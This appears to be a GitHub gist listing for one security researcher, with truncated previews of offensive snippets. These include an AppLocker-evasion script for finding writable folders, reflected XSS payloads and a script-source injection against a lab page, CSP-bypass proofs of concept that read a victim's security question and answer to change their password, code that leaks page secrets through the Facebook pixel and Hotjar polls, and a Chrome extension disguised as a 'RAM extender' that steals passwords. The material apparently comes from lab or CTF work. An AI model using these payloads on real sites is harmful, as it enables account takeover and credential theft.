Felipe Molina felmoltor

🍊

Is this real life?

felmoltor / Search-Writable.ps1

Created November 23, 2023 10:19

Search writable folders and network shares without "accesschk.exe"

	# Author: Felipe Molina de la Torre
	# Date: Novermber 2023
	# Summary: Accessckl-like script, but without using external executable files like "accesschk.exe".
	# It shows you the folders and executables where your user have write permissions and why.
	# This is useful for systems where AppLocker is in place and you cannot execute arbitrary exes but you can execute PowerShell.

	# Class to store permissions
	class Permissions {
	[string]$GroupName
	[string]$SID

felmoltor / secret.php

Last active August 23, 2023 20:47

secret #1 vuln

	// GET /secret.php?msg=This%20is%20an%20error";alert("hello%20xss");var%20foo="var

	// […]
	<script defer nonce="ceT7vflNlU8YT58gnQnZH4xi">
	function displayError(){
	document.getElementById('error-div').innerText="Error 1005: This is an error";alert("Hello xss");var foo="var";
	}
	displayError();
	</script>
	// […]

felmoltor / secret.php

Last active August 23, 2023 20:47

secret 2 vuln

	// GET /secret.php?source=js/debug.js

	// […]
	<script defer nonce="ceT7vflNlU8YT58gnQnZH4xi">
	const urlParams = new URLSearchParams(window.location.search);
	const source = urlParams.get('source');
	var s=document.createElement("script");
	s.src=source;
	document.head.appendChild(s);
	</script>

felmoltor / secret.php

Last active August 23, 2023 20:42

secret

felmoltor / Lambda-csp-bypass-code.js

Last active August 23, 2023 14:52

Lambda

	'use strict';
	export const handler = async (event) => {
	const response = {
	statusCode: 200,
	headers: {
	'Content-Type': 'text/html',
	},
	body: event.queryStringParameters.data,
	};
	var decoded=Buffer.from(event.queryStringParameters.data, 'base64').toString('ascii');

felmoltor / PoC-CSP-Bypass-pwn.js

Created August 23, 2023 14:50

Change user password and security answer

	fetch('/profile.php').then(function (response) {
	return response.text();
	}).then(function (html) {
	// This is the HTML from our response as a text string
	const parser = new DOMParser();
	const pd = parser.parseFromString(html, "text/html");
	sq=pd.getElementById('security_question').value;
	sa=pd.getElementById('security_answer').value;
	email=pd.getElementById('email').value;
	username=pd.getElementById('username').value;

felmoltor / Facebook-exfil-csp.js

Created August 23, 2023 14:45

Facebook CSP Exfiltration

	fbq('init', '1179785999289471');
	fbq('trackCustom', 'MyEvent-keyfc',{
	data: "Secret ingredient is: '"+document.getElementById('secret-ingredient').innerText+"'"
	});

felmoltor / Hotjar-poll-answer.js

Last active August 23, 2023 14:44

PoC for the CSP bypass Lab

	fetch('/profile.php').then(function (response) {
	return response.text();
	}).then(function (html) {
	// This is the HTML from our response as a text string
	const parser = new DOMParser();
	const pd = parser.parseFromString(html, "text/html");
	sq=(pd.getElementById('security_question')).value;
	sa=(pd.getElementById('security_answer')).value;
	var data = {"utk":null, "response_content":"{\"version\":4 ,\"answers\":[{\"questionUuid\":\"78942292\"
	,\"answer\":\"Something else\",

felmoltor / smol-hello.js

Created July 10, 2023 22:36

console.log("Hello from a gist file hosted in felmoltor's github");

felmoltor / background.js

Last active March 21, 2023 14:44

Chrome Extension to Snatch Passwords when Unhidden

	// TODO: Find all the fields that might be a password field.
	// for now, we can do it only for a input field with id "password"

	console.log("RAM extender is looking around.");

	chrome.runtime.onMessage.addListener(
	function(request, sender, sendResponse) {
	console.log(sender.tab ?
	"from a content script:" + sender.tab.url :
	"from the extension");